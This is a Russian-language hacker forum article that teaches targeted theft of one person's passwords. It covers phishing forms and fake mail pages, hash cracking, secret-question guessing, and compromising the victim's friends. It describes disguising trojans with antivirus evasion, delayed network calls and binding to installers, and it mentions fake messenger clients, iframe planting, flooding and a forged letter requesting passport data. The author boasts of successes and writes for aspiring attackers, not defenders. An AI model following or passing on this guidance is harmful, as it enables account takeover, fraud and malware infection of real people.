Откинем сразу все давно изученные всеми способы СИ, такие как отправление, от якобы адреса администрации мыла письма о том, что если вы не вышлете на свой пароль, то мы заблочим ваше мыло… Короче забудьте про такую хрень.
В такой ситуации нужно действовать более тонко. Поэтому я опишу несколько способов и стратегий атаки.
Начнем со стратегий, т.е все наши стратегии можно условно разделить на две большие группы:
1). Мы аккуратно подсовываем юзеру все наши ловушки, стараясь сделать так, что бы он не заметил, что на него ведется охота.
2). Мы просто заваливаем его атаками ожидая когда же не выдержат его нервы и он сделает ошибочный ход, который станет для него роковым… ( я не слишком ли мрачно ?))
Теперь о способах входящих в первую группу:
Допустим нам просто нужно узнать его пароль на мыло или на форум или еще на что-то. Будем пытаться это аккуратно сделать.


- Попробуем тупо узнать его пароль:
• подсунем ему форму, в которой он должен будет ввести пароль – можете создать свой форум где поставить на форму на пыхе функцию записи паролей и логинов в файл, или просто подсунуть форму на бесплатном хосте. Можете сделать фейк почты и подсунуть его – послать например ему на мыло как будно от какого-то сервиса письмо. Небольшое знание php вам все таки потребуется.
• ломануть форум где он уже зареган и расшифровать попробовать его пароль.
• Использовать слабость человеческой психологии – посмотрите, на форумах, на мыле, в анкете, что за секретные вопросы стоят и какие мыла прописаны в до инфе. – иногда можно в этой области много наловить…
• Ломаните его знакомого или знакомую – и уже тут пробуйте ловить – можно через них пробовать узнать пароль одним из вышеуказанных способов, а можно и просто чуть ли не в открытую спросить ответ на секретный вопрос на каком нибудь его захудалом мыле.
• Еще такой известный и везде разжеванный и расписанный способ как слабость мужского пола к женскому и то, что «продвинутый» пользователь падок на лесть со стороны «нуба» и будет ему помогать: тут уж трудно советовать что-либо конкретно, поэтому возьму в качестве примера себя: мне по барабану девченка это или парень – нуб и в Африке нуб, не смотря на то какого этот нуб пола. Так что некоторые могут не обращать никакого внимания на девушек в сети, НО – если они не знают этих девушек в реалке – тут ситуация уже совсем другая – тут уже никуда от женской васти не деться…(((




Теперь давайте порассуждаем вместе: все мы знаем как работает Троян пинч: вы просто запускаете файлик небольшой и хард начинает крутиться и потом почему-то какой-то процесс проситься в инет на какой то левый сайт…
Дык это все знают, поэтому надо нарушить это по всем пунктам, а именно:
1). Троян не должен весить (если вы его впариваете не через связку сплоитов конечно) меньше 30 Кб – это сразу наводит на подозрения.
2). Нужно что бы файл не палился антивирусом, который стоит у чела – узнавайте это как хотите…
3). Файл не должен проситься в Интернет – прикрутите к нему таймаут, что бы он начал допустим туда проситься через некоторое только время или сделайте обход фаерволов.
4). Файл должен что то ДЕЛАТЬ – т.е если это просто программа на 500 ( вы добавили мусора в код) с красивой иконкой, но при запуске ничего видимого не происходит – это н есть гуд, Троян должен в таком случае проявлять хоть какую-то видимую активность – например выкинуть окно об ошибке или запустить какое-либо приложение на компьютере (вызвать к примеру игру «Сапер»).
5). Если чел запускает файл будучи в оффлайне и это приложение самоудаляется и начинает пробовать сквозь разомкнутые провода пробиться в Интернет на сайт на tu1.ru – то это просто писец…

А вот возможные решения этих пяти задач (не по порядку, а в разнобой):
- Добавить мусора в код
- Склеить с прогой (желательно с инсталлятором)
- Склеить с тем, в чем уж никак не должно быть Трояна: например с инсталлятором антивируса или фаервола.
- Прикрутите обход фаерволов или используйте приватный трой с обходом их
- Прикрутите проверку на наличие связи с сетью Интернет дабы приложение не полезло туда когда чел в оффлайне
- Прочитайте справку по cmd командам в Винде и склеивайте с такими файлами – можно вызвать ими почти что угодно
- Сымитируйте зависание программы, выдавание кучи окошек, бешеного вращение харда..
- И др.



Теперь самое время вспомнить о нестандартных способах, которые мало распространены:
- Фейк программы (например фейк qip, Аси, мейл агента – тут есть несколько вариантов и для каждого из них должна быть своя легенда – т.е некоторые фейки ничем не отличаются от квипа – их надо впаривать как полноценный квип, а некоторые должны из себя представлять глючную версию квипа и никак не хотеть запускаться – тут надо выбирать фейк что бы он до конца отвечал требованиям его легенды)
- Другой Троян. Подразумевается, что под другим троем имеется в виду не пинч и не ксинч и не другой как 2 капли воды похожий на него. Т.е например попробовать кейлоггер или какой либо другой Троян для единичного впаривания – т.е очень редкий, нераспространенный и оригинально работающий.
- Попробовать пробить чела в жизни: по телефону, по почте, вживую…
Тут только ваша фантазия. Никто не мешает вам начать пробовать узнавать его пароль с бейсбольной битой поджидая его у подъезда.


Ну, я вроде закончил рассказывать о первой стратегии. Теперь перейдем ко второй стратегии. Вот примерные наши действия:
1). Вы начинаете жертве подсовывать фейки чего только можно и куда только можно самым наглым образом.
2). Кидаете ему с кривых и не очень девятизнаков ссылки на сайты с вашими ифреймами и просто ссылки на Трояны.
3). Флудите ему Асю и мыло.
4). Присылаете ему на мыло троев и ссылки на них
5). Пробуете его пробить одновременно всеми способами что вы знаете и что вы нашли выше в моей статье.



А теперь самое интересное, притом надеюсь, что по порядку я смогу это рассказать: примеры из моей личной практики!
Перечитайте эту статью до этого места с самого начала, для того, что бы понимать какой пример к какому месту в теории относиться.
*было дело, что подделал письмо под спам рассылку и попросил зарегиться для получения халявы на сайте – пароль был у меня…
*посылал открытки будто бы от мейл.ру – переходили по ссылке на фейк и пароли были у меня
*приходилось ломать форум и брутиь хеш – все прошло на «ура»
*угадывал секретный вопросы ( однажды был такой вопрос: «моя любимая жевательная резинка» - я угадал с первого раза – орбит)
*да…поломать знакомого нуба – это просто жесть… - иногда действует просто изумительно…
*просьба о помощи совместно с восхвалениями бывает делают свое дело – чел начинает болтать и рассказывать веря тебе что ты нуб… - под шумок можно и Трояна впарить…
*Теперь конкретно о Троянах: поставка ифреймов на сайты, впарка троя под всем что только может передаваться в сети Интернет, под всеми мыслимыми и немыслимыми названиями, функциями и иконками. С выдаванием ошибок, с таймаутами и другими прибамбасами – это отвлечет чела от мысли, что это пинч.
Использование самописных Троянов бывает очень полезно – пинча знают и защищаются от него, значит надо влезть туда, что еще не додумались защищать.
*Фейки квипа и других прог выложенные в соответсвующем месте – пару раз давали мне нужные пароли…
*При краже, не совсем стандартной информации помогали самописные Трояны
*Однажды приходилось писать письмо в бумажном виде от какой-то левой организации запрашивая паспортные данные ( у чела был вопрос секретный – серия и номер моего паспорта)

В общем можно сделать такой общий вывод: не надо зацикливаться на пинче и впаривании «фотографий блондинки» - есть много других способов, которыми вы можете ловить не только блондинок на девятизнаках. В общем статья написана, на часах 4 часа утра и я пошел спать…
Спасибо за внимание, надеюсь, что предложенная информация является востребованной и актуальной…
Написано специально для http://xakepok.org/ Ссылка при копировании обязательна.


Вернуться в «Частная Библиотека»

Кто сейчас на форуме

Количество пользователей, которые сейчас просматривают этот форум: нет зарегистрированных пользователей и 4 гостей